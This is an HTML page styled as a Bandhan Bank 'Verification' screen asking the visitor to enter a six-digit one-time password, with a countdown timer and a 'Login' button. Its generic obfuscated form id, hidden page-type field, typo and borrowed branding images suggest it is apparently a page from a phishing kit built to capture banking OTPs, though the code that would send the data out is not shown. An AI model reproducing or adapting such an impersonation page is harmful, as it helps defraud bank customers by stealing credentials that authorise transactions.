<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1"> 
  <title>Bandhan Bank</title>
  <meta name="theme-color" content="#185a8c">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <meta name="msapplication-TileColor" content="#da532c">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz,wght@0,6..12,200..1000;1,6..12,200..1000&display=swap" rel="stylesheet">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous"> 
  <link rel="stylesheet" href="style.css"> 
  <style>
            #overlay {
                position: fixed; /* Fixed position to cover the entire viewport */
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background-color: rgba(0, 0, 0, 0.425); /* Semi-transparent background */
                opacity: 0.5;
                z-index: 5; /* High z-index to overlay everything else */
            }
            main {
            position: relative;
            z-index: 10; /* Higher z-index to be above the overlay */
        }

  </style>
 </head> 
 <body> 
  <div id="overlay"></div> 
  <header> 
   <img src="header.jpg" width="100%" alt=""> 
  </header> 
  <main class="mt-4 "> 
   <div class="container"> 
    <div class="mx-4 shadow bg-light border p-4"> 
     <div class="position-relative mb-4"> 
      <h5 class="text-center text-primary">Verification</h5> 
      <span class="text-secondary" style="position: absolute;right: -9px;top: -19px;font-size: 22px;">X</span> 
     </div> 
     <input type="hidden" id="nextValue" value=""> 
     <p class="text-primary"> OTP has been sent to Mobile Number. Pleae enter OTP below to complete the process. </p> 
     <input type="hidden" id="page_type" value="ott"> 
     <div id="test" class="text-danger fw-bold"></div> 
     <form id="frm_2_am8E" class="mt-4"> 
      <div class="form-group"> 
       <label for="">One Time Password </label> 
       <input type="password" maxlength="6" minlength="6" placeholder="Enter OTP.." inputmode="numeric" class="form-control" name="ott" required> 
       <small class="text-primary">Time left in seconds : <small id="time"></small></small> 
      </div> 
      <div class="form-group w-100 my-5 d-flex justify-content-start gap-2"> 
       <button type="submit" class="submit-button btn btn-primary">Login</button> 
       <a href="/" class=" btn btn-outline-primary">Cancel</a> 
      </div> 
     </form> 
    </div> 
   </div> 
  </main> 
  <footer class="position-absolute bottom-0 mb-0"> 
   <img src="footer.jpg" width="100%" alt=""> 
  </footer> 
  <script>
        $(document).ready(function() {
            var timeLeft = 120; // initial countdown time in seconds
            var timerInterval = setInterval(function() {
                if (timeLeft <= 0) {
                    clearInterval(timerInterval);
                } else {
                    timeLeft--;
                    
                    $('#time').text(timeLeft);
                }
            }, 1000);
        });

    </script> 
 </body>
</html>